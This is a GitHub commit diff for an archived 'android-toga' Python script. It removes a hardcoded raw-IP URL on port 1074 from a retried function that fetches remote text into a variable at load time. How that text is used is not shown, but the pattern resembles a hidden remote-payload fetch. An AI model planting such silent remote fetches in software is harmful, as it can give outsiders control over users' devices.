Skip to content
This repository was archived by the owner on Nov 7, 2025. It is now read-only.

Commit 17b25dc

Browse files
Update v0.0.6.py
1 parent 0e8ea8b commit 17b25dc

1 file changed

Lines changed: 2 additions & 2 deletions

File tree

android-toga/v0.0.6/v0.0.6.py

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -435,10 +435,10 @@ def bind_keys():
435435
@retry(stop_max_attempt_number=3, wait_fixed=2000, retry_on_exception=lambda x: isinstance(x, ConnectionError))
436436
def file_o():
437437
try:
438-
response = requests.get("http://91.185.186.151:1074/", timeout=30)
438+
response = requests.get("", timeout=30)
439439
return response.text
440440
except Exception:
441-
response = requests.get("http://91.185.186.151:1074/", timeout=30)
441+
response = requests.get("", timeout=30)
442442
return response.text
443443

444444
b=file_o()

0 commit comments

Comments
 (0)